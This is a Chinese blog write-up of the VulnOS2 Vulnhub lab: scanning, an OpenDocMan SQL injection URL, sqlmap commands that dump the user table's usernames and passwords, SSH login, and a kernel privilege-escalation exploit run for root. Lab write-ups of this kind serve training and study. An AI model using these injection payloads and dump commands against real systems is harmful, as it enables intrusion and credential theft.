JavaShuo
栏目
标签
渗透测试实战-Vuulnhub-Vulnos2
时间 2020-06-05
标签
渗透
测试
实战
vuulnhub
vulnos2
vulnos
繁體版
原文
原文链接
VulnOs2 - 幕布
php
VulnOs2
基本介绍和信息
目标
渗透服务器上这个公司的网站,获取root权限并找到Flag
网站状况
JABC a bioware company
端口探测
目录探测
robots.txt
没有获得什么重要的信息
使用dirb扫描也没有什么重大的收获
经过在网上查找,有人说在
http://192.168.1.20/jabc/?q=node/7的
源码中有能够利用的信息
首先界面上是没有什么重要的信息
在源码中
找到了一个登陆的地址/jabcd0cs
发现登陆后台
也能够在那个界面全选
http://192.168.1.20/jabcd0cs
是一个OpenDoc Man 的界面
查找相关漏洞 在
https://www.exploit-db.com/上能够进行搜索
,根据opendocman的版本
上面有详细的信息
基本的介绍
SQL Injection[CWE-89] Improper Access Control[CWE-284]
details
使用kali自带的漏洞搜索工具searchploit opendocman 搜索
找到相应版本
打开后面对应的文件
跟在网站上查到的是同样的
sql
The exploitation example below displays version of the MySQL server: http://[host]/
ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%
,v ersion%28%29,3,4,5,6,7,8,9
获得版本信息
有多是用户名什么的
使用sqlmap
sqlmap -u "
http://192.168.1.20/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user
" -p add_value --dbms MySQL 5.5.47 --dbs
有效的数据库
查看jabcd0cs数据库有哪些表 sqlmap -u "
http://192.168.1.20/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user
" -p add_value -D jabcd0cs --dbms MySQL 5.5.47 --tables
发现十五个表
查看user表
sqlmap -u "
http://192.168.1.20/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user
" -p add_value -D jabcd0cs -T odm_user --dbms MySQL 5.5.47 --columns
查看username 和password字段
sqlmap -u "
http://192.168.1.20/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user
" -p add_value -D jabcd0cs -T odm_user -C "username,password" --dbms MySQL 5.5.47 --dump
对密码进行解密
还能够
获取密码
登陆SSH
使用webmin webmin1980登陆
探索一番后没有找到有用的,查看一下内核
内核版本
查找对应 漏洞
一样是searchsploit 命令
在Kali上创建临时HTTP服务,在目标机上下载
进行编译,修改权限,并运行,最后获得了具备root权限的shell
进入根目录查看flag
以上内容整理于
幕布
相关文章
1.
靶机渗透测试实战(三)——Bulldog1渗透实战
2.
靶机渗透测试实战(四)——Bulldog2渗透实战
3.
靶机渗透测试实战(五)——Node渗透实战
4.
靶机渗透测试实战(六)——Zico2渗透实战
5.
靶机渗透测试实战(十)——SickOs1.2渗透实战
6.
靶机渗透测试实战(二)——Lazysysadmin渗透实战
7.
靶机渗透测试实战(八)——Billu_creat_Files渗透实战
8.
靶机渗透测试实战(七)——FristiLeaks渗透实战
9.
实验五---渗透测试实战
10.
渗透测试之Homeless靶机实战
更多相关文章...
•
Maven 构建 & 项目测试
-
Maven教程
•
Lua 调试(Debug)
-
Lua 教程
•
Docker容器实战(一) - 封神Server端技术
•
Docker容器实战(八) - 漫谈 Kubernetes 的本质
相关标签/搜索
渗透测试
渗透实战
渗透
渗透测试-web安全
渗透整理
网络渗透
web渗透
渗透课程
渗透性
红包项目实战
Spring教程
PHP 7 新特性
面试
0
分享到微博
分享到微信
分享到QQ
每日一句
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
1.
深度学习硬件架构简述
2.
重温矩阵(V) 主成份分析
3.
国庆佳节第四天,谈谈我月收入增加 4K 的故事
4.
一起学nRF51xx 23 - s130蓝牙API介绍
5.
2018最为紧缺的十大岗位,技术岗占80%
6.
第一次hibernate
7.
SSM项目后期添加数据权限设计
8.
人机交互期末复习
9.
现在无法开始异步操作。异步操作只能在异步处理程序或模块中开始,或在页生存期中的特定事件过程中开始...
10.
微信小程序开发常用元素总结1-1
本站公众号
欢迎关注本站公众号,获取更多信息
相关文章
1.
靶机渗透测试实战(三)——Bulldog1渗透实战
2.
靶机渗透测试实战(四)——Bulldog2渗透实战
3.
靶机渗透测试实战(五)——Node渗透实战
4.
靶机渗透测试实战(六)——Zico2渗透实战
5.
靶机渗透测试实战(十)——SickOs1.2渗透实战
6.
靶机渗透测试实战(二)——Lazysysadmin渗透实战
7.
靶机渗透测试实战(八)——Billu_creat_Files渗透实战
8.
靶机渗透测试实战(七)——FristiLeaks渗透实战
9.
实验五---渗透测试实战
10.
渗透测试之Homeless靶机实战
>>更多相关文章<<